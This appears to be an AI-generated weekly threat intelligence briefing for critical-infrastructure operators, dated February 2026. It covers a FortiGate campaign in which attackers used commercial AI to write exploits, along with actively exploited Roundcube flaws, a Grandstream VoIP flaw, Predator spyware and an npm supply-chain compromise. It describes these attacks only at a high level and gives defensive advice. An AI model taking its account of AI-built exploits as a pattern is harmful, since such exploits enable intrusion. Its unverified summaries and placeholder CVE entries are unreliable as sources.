Security Intelligence for Real-World Decisions
← Back to Archive

AI-Assisted Threat Actor Breaches 600+ FortiGate Devices Globally; CISA Adds Actively Exploited Roundcube Flaws to KEV Catalog

Critical Infrastructure Intelligence Briefing

Reporting Period: February 15–22, 2026
Published: Sunday, February 22, 2026

1. Executive Summary

This week's intelligence highlights a significant escalation in AI-assisted cyberattacks targeting network infrastructure, with a Russian-speaking threat actor compromising over 600 FortiGate devices across 55 countries using commercial generative AI tools. This campaign represents a concerning evolution in threat actor capabilities and the democratization of sophisticated attack methodologies.

Key Developments:

  • AI-Enabled Attack Campaign: A financially motivated threat actor leveraged commercial AI services to accelerate exploitation of FortiGate firewalls, achieving unprecedented scale in just five weeks. Amazon and Fortinet have issued coordinated warnings.
  • Active Exploitation of Webmail Infrastructure: CISA added two Roundcube vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog, indicating active targeting of email infrastructure—a critical communication backbone for many organizations.
  • VoIP Infrastructure at Risk: A critical vulnerability in Grandstream phone systems (CVE-2026-2329) enables unauthenticated remote code execution with root privileges, potentially exposing voice communications to interception.
  • Mobile Surveillance Threat: New analysis reveals Predator spyware capabilities to evade iOS security indicators while conducting covert surveillance, raising concerns for high-value targets in critical infrastructure leadership.
  • Supply Chain Compromise: A compromised npm package has been distributing the OpenClaw malware to developer machines, highlighting persistent software supply chain risks.

Immediate Actions Required:

  • Organizations using FortiGate devices should immediately audit configurations, review logs for indicators of compromise, and ensure all patches are current
  • Roundcube webmail deployments require immediate patching per CISA guidance
  • Grandstream phone system operators should apply available patches and implement network segmentation

2. Threat Landscape

Nation-State and Advanced Threat Actor Activities

AI-Assisted FortiGate Campaign

The most significant development this week involves a Russian-speaking, financially motivated threat actor who successfully compromised more than 600 FortiGate firewall devices across 55 countries within a five-week period. This campaign is notable for its use of commercial generative AI services to:

  • Automate vulnerability identification and exploitation
  • Generate custom exploit code and payloads
  • Scale attack operations beyond traditional manual capabilities
  • Evade detection through AI-generated variations in attack patterns

Analysis: This campaign represents a significant inflection point in the threat landscape. The use of commercially available AI tools to accelerate and scale attacks suggests that similar techniques will become increasingly common across threat actor tiers. Critical infrastructure operators should anticipate that AI-assisted attacks will reduce the time between vulnerability disclosure and widespread exploitation.

Sources: The Hacker News, Bleeping Computer

Mobile Surveillance: Predator Spyware Evolution

Security researchers have documented new capabilities in Intellexa's Predator spyware that allow it to hook into iOS SpringBoard to hide microphone and camera activity indicators while secretly streaming feeds to operators. This technique bypasses Apple's privacy indicators designed to alert users when recording is active.

Implications for Critical Infrastructure:

  • Executive leadership and key personnel in critical infrastructure sectors may be targeted for intelligence collection
  • Sensitive operational discussions could be compromised without visible indicators
  • Organizations should review mobile device policies for personnel with access to sensitive infrastructure information

Source: Bleeping Computer

Cybercriminal Developments

Supply Chain Attack: npm Package Compromise

A compromised npm package has been silently installing OpenClaw malware on developer machines. This supply chain attack vector poses significant risks to organizations developing software for critical infrastructure systems.

Risk Assessment:

  • Development environments for ICS/SCADA software could be compromised
  • Malicious code could be introduced into critical infrastructure control systems
  • Organizations should audit npm dependencies and implement software composition analysis

Source: CSO Online

Emerging Attack Vectors

Attack Vector Target Severity Status
AI-Assisted Exploitation Network Infrastructure (FortiGate) CRITICAL Active Exploitation
Webmail Vulnerabilities Roundcube Deployments HIGH Active Exploitation (KEV)
VoIP RCE Grandstream Phone Systems CRITICAL Patch Available
Supply Chain npm Developer Ecosystem HIGH Active Distribution

3. Sector-Specific Analysis

Energy Sector

Threat Level: ELEVATED

The FortiGate compromise campaign poses direct risks to energy sector organizations that rely on Fortinet products for network security. Energy sector entities should prioritize:

  • Immediate audit of all FortiGate devices for indicators of compromise
  • Review of network segmentation between IT and OT environments
  • Enhanced monitoring of firewall configuration changes
  • Verification that management interfaces are not exposed to the internet

Recommended Action: Energy sector ISACs should coordinate threat intelligence sharing regarding observed FortiGate exploitation attempts within member organizations.

Water & Wastewater Systems

Threat Level: ELEVATED

Water utilities often operate with limited cybersecurity resources and may be particularly vulnerable to the types of attacks observed this week. Key concerns include:

  • Many water utilities use Fortinet products for perimeter security
  • Remote access capabilities for distributed infrastructure may be exposed
  • Limited security monitoring capabilities may delay detection

Recommended Action: WaterISAC members should leverage shared resources for FortiGate configuration audits and consider implementing additional network monitoring at IT/OT boundaries.

Communications & Information Technology

Threat Level: HIGH

Multiple developments this week directly impact the communications sector:

Grandstream VoIP Vulnerability (CVE-2026-2329)

  • Impact: Unauthenticated remote code execution with root privileges
  • Risk: Call interception, network pivot point, surveillance
  • Affected Systems: Grandstream phone systems widely deployed in enterprise environments
  • Mitigation: Apply vendor patches immediately; implement network segmentation for VoIP infrastructure

Roundcube Webmail Exploitation

  • CISA's addition of two Roundcube flaws to the KEV catalog indicates active targeting
  • Email infrastructure compromise can enable further attacks through credential theft and business email compromise
  • Organizations must patch within CISA-mandated timelines

Source: SecurityWeek, The Hacker News

Transportation Systems

Threat Level: MODERATE

While no transportation-specific incidents were reported this week, the sector should note:

  • FortiGate devices are commonly deployed in transportation network infrastructure
  • Aviation and maritime sectors should audit network security appliances
  • Rail and mass transit operators should verify OT network isolation

Healthcare & Public Health

Threat Level: ELEVATED

Healthcare organizations face compounded risks from this week's developments:

  • FortiGate devices protecting healthcare networks may be compromised
  • Roundcube webmail is used by some healthcare organizations for email
  • VoIP systems in healthcare facilities may be vulnerable to Grandstream flaws
  • Predator spyware capabilities raise concerns for healthcare executive targeting

Recommended Action: Health-ISAC members should prioritize vulnerability scanning and patching across all identified vulnerable systems.

Financial Services

Threat Level: ELEVATED

Financial institutions should be particularly concerned about:

  • The AI-assisted attack methodology, which may be adapted for financial sector targeting
  • Supply chain risks from compromised developer tools
  • VoIP interception risks for sensitive financial communications

4. Vulnerability & Mitigation Updates

Critical Vulnerabilities Requiring Immediate Attention

CISA Known Exploited Vulnerabilities (KEV) Additions

Date Added: February 21, 2026

CVE Product Description Remediation Deadline
TBD Roundcube Webmail Two actively exploited vulnerabilities Per CISA BOD 22-01

Action Required: Federal agencies must remediate per CISA timelines. All organizations are strongly encouraged to prioritize patching.

Source: The Hacker News

CVE-2026-2329: Grandstream Phone Systems

  • Severity: CRITICAL
  • Attack Vector: Network (no authentication required)
  • Impact: Remote code execution with root privileges
  • Exploitation: Call interception, network compromise

Mitigation Steps:

  1. Apply vendor patches immediately
  2. Segment VoIP infrastructure from general network
  3. Implement access controls limiting management interface exposure
  4. Monitor for unusual VoIP traffic patterns
  5. Audit call logs for signs of interception

Source: SecurityWeek

FortiGate Security Recommendations

In response to the AI-assisted compromise campaign, organizations should implement the following measures:

Immediate Actions:

  • Verify all FortiGate devices are running the latest firmware
  • Audit administrative accounts for unauthorized access
  • Review and restrict management interface access
  • Enable and review logging for configuration changes
  • Implement multi-factor authentication for all administrative access

Detection Indicators:

  • Unexpected configuration changes
  • New administrative accounts
  • Unusual outbound connections from firewall devices
  • Modified firewall rules or policies
  • Disabled logging or security features

AI Security Tool Development

Anthropic has launched Claude Code Security, an AI-powered vulnerability scanning capability. While this represents a positive development for defensive capabilities, organizations should:

  • Evaluate AI-assisted security tools as part of defense-in-depth strategies
  • Maintain human oversight of AI-generated security recommendations
  • Consider how AI tools can accelerate vulnerability identification in critical systems

Source: The Hacker News

5. Resilience & Continuity Planning

Lessons from the FortiGate Campaign

The AI-assisted FortiGate compromise campaign offers several important lessons for critical infrastructure resilience:

Key Takeaways:

  • Speed of Exploitation: 600+ devices compromised in 5 weeks demonstrates the accelerated pace of AI-assisted attacks. Traditional patch cycles may be insufficient.
  • Geographic Scope: 55 countries affected indicates no region is immune; global infrastructure operators must coordinate response.
  • Defense Implications: Organizations must assume that AI-assisted attacks will become the norm and adjust defensive postures accordingly.

Resilience Recommendations:

  1. Reduce Attack Surface: Minimize internet-exposed management interfaces
  2. Implement Zero Trust: Assume network perimeter devices may be compromised
  3. Enhance Monitoring: Deploy behavioral analytics to detect anomalous device behavior
  4. Segment Networks: Ensure compromise of perimeter devices cannot directly impact OT systems
  5. Plan for Rapid Response: Develop playbooks for mass device compromise scenarios

Supply Chain Security Considerations

The npm package compromise highlights ongoing software supply chain risks:

  • Implement software composition analysis (SCA) tools
  • Maintain software bills of materials (SBOMs) for critical systems
  • Establish vendor security assessment programs
  • Consider air-gapped development environments for critical infrastructure software

Cross-Sector Dependencies

This week's threats highlight critical dependencies:

  • Network Security Infrastructure: FortiGate devices protect multiple critical infrastructure sectors; compromise creates cascading risks
  • Communications: VoIP and email vulnerabilities affect all sectors' ability to coordinate
  • Software Development: Supply chain compromises can propagate across all sectors using affected components

6. Regulatory & Policy Developments

CISA Actions

CISA's addition of Roundcube vulnerabilities to the KEV catalog triggers mandatory remediation timelines for federal agencies under Binding Operational Directive (BOD) 22-01. While not mandatory for private sector organizations, critical infrastructure operators are strongly encouraged to:

  • Treat KEV additions as high-priority patching requirements
  • Align internal vulnerability management with CISA timelines
  • Report exploitation attempts through appropriate channels

AI Workforce Development

EC-Council has expanded its AI certification portfolio to address workforce readiness and security concerns. Key statistics driving this initiative:

  • $5.5 trillion in global AI risk exposure
  • 700,000 U.S. workers requiring AI-related reskilling
  • New certifications include Certified CISO v4 with AI security components

Implication for Critical Infrastructure: Organizations should evaluate AI security training requirements for security personnel, particularly given the emergence of AI-assisted attack methodologies.

Source: The Hacker News

Anticipated Regulatory Developments

Based on current threat trends, critical infrastructure operators should prepare for potential regulatory focus on:

  • AI security requirements and governance frameworks
  • Enhanced network device security standards
  • Supply chain security attestation requirements
  • Incident reporting for AI-assisted attacks

7. Training & Resource Spotlight

New Security Tools and Capabilities

Claude Code Security

Anthropic's new AI-powered vulnerability scanning tool offers:

  • Automated codebase security analysis
  • Vulnerability identification and patch suggestions
  • Integration with development workflows

Critical infrastructure organizations developing custom software should evaluate this and similar tools for security enhancement.

Workforce Development

EC-Council AI Certifications

New certification offerings address the intersection of AI and cybersecurity:

  • AI security fundamentals
  • AI risk management
  • Certified CISO v4 (includes AI security components)

Recommendation: Critical infrastructure organizations should consider incorporating AI security training into professional development programs.

Recommended Training Focus Areas

Based on this week's threat landscape, organizations should prioritize training in:

  • Network device security and hardening
  • AI-assisted attack recognition and response
  • Supply chain security assessment
  • Mobile device security for executives
  • VoIP security and monitoring

8. Looking Ahead: Upcoming Events

NIST Events

Technologies and Use Cases for Smart Standards

  • Date: March 19, 2026
  • Focus: Standards development for AI, blockchain, and IoT technologies
  • Relevance: Critical infrastructure operators should monitor standards development affecting emerging technology deployments

Building the Strategic Supply Chain Network

  • Date: March 9, 2026
  • Focus: Addressing supply chain vulnerabilities exposed by recent disruptions
  • Relevance: Directly applicable to critical infrastructure supply chain resilience

Cybersecurity for IoT Workshop: Future Directions

  • Date: March 31, 2026
  • Focus: Emerging IoT security trends and implications
  • Relevance: IoT security is increasingly critical for operational technology environments

Iris Experts Group Annual Meeting

  • Date: June 25, 2026
  • Focus: Iris recognition technology for government applications
  • Relevance: Physical security and access control for critical infrastructure

Threat Awareness Periods

  • Ongoing: Heightened vigilance for FortiGate exploitation attempts
  • Ongoing: Monitor for Roundcube exploitation in organizational environments
  • Q1 2026: Anticipate continued evolution of AI-assisted attack methodologies

Recommended Preparation Activities

  • Conduct tabletop exercises focused on mass network device compromise scenarios
  • Review and update incident response playbooks for AI-assisted attacks
  • Assess organizational readiness for supply chain compromise events
  • Evaluate mobile device security policies for executive personnel

Contact and Information Sharing

Critical infrastructure owners and operators are encouraged to:

  • Report suspicious activity to CISA: www.cisa.gov/report
  • Share threat intelligence through sector-specific ISACs
  • Participate in public-private partnership initiatives
  • Subscribe to CISA alerts and advisories

This briefing is derived from open-source intelligence and is intended to support critical infrastructure protection efforts. Recipients are encouraged to verify information through official channels and adapt recommendations to their specific operational environments.

Disclaimer

This briefing is generated using AI analysis of public news sources. Always verify critical information through authoritative sources before taking action.